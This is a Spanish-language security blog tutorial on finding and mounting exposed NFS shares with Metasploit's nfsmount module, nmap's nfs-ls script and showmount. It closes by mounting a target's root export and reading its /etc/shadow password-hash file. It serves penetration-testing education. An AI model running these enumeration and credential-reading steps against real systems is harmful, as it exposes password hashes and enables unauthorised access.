Detectar Recursos Compartidos de Archivos en Red - NFS

  • Posted on: 14 March 2014
  • By: ReYDeS

NFS (Network File System) o por su traducción al idioma Español Sistema de Archivos de Red, es un protocolo de sistema de archivos distribuido, el cual permite a los usuarios sobre una computadora cliente el acceder a archivos a través de la red como si se accediera a un almacenamiento local.

Una manera de encontrar recursos compartidos de archivos en red es utilizar el módulo “nfsmount” de Metasploit Framework.

Se procede a buscar el módulo auxiliar "nfsmount".

> search nfsmount

Para obtener más información del módulo se utiliza el comando info.

> info auxiliary/scanner/nfs/nfsmount

Se le indica a Metasploit Framework el uso del módulo nfsmount, para luego mostrar sus opciones.

> use auxiliary/scanner/nfs/nfsmount
> show options

Se define la opción RHOSTS con la dirección IP del objetivo de evaluación, y luego se procede a ejecutar el módulo.

> set RHOSTS 192.168.0.16
> run

En la anterior imagen se puede visualizar que se ha identificado el recurso compartido “/”.

Otra herramienta que se utiliza para detectar recursos compartidos de archivos en red es nmap. El script de nombre “nfs-ls” de nmap, intenta obtener información útil desde las exportaciones de archivos NFS. El script empieza enumerando y montando las exportaciones NFS remotas.

# nmap -n -Pn -p111 --script=nfs-ls 192.168.0.16

Esta información también puede ser obtenida de manera manual utilizando el comando “showmount”. El cual permite mostrar información de montaje para un servidor NFS, para esto realiza consultas al demonio mount sobre el objetivo remoto por información sobre el estado del servidor NFS en esta máquina. La opción “-e” muestra la lista de exportación del servidor NFS.

# showmount -e 192.168.0.16

Ahora para montar el recurso compartido en nuestro sistema Kali Linux se utilizan los siguientes comandos. El comando "mkdir" crea el directorio de nombre /objetivo/ dentro de la carpeta /tmp/. Y el comando mount es el encargado de montar el recurso compartido en la carpeta /tmp/objetivo/.

# mkdir /tmp/objetivo
# mount -o nolock -t nfs 192.168.0.16:/ /tmp/objetivo/

Acto seguido y a modo de practica, se ingresa al directorio donde se ha montado el recurso compartido, y se procede a visualizar las primeras líneas del archivo /etc/shadow del objetivo de evaluación.

# cd /tmp/objetivo/
# head etc/shadow

Fuentes:

http://en.wikipedia.org/wiki/Network_File_System
http://www.rapid7.com/db/modules/auxiliary/scanner/nfs/nfsmount
http://nmap.org/nsedoc/scripts/nfs-ls.html
https://community.rapid7.com/docs/DOC-1875

Sobre el Autor


Alonso Eduardo Caballero Quezada - ReYDeS
Instructor y Consultor Independiente en Ciberseguridad
Correo Electrónico: ReYDeS@gmail.com
Twitter: https://twitter.com/Alonso_ReYDeS
LinkedIn: https://pe.linkedin.com/in/alonsocaballeroquezada/
Facebook: https://www.facebook.com/alonsoreydes
Youtube: https://www.youtube.com/c/AlonsoCaballero


Webinar Informática Forense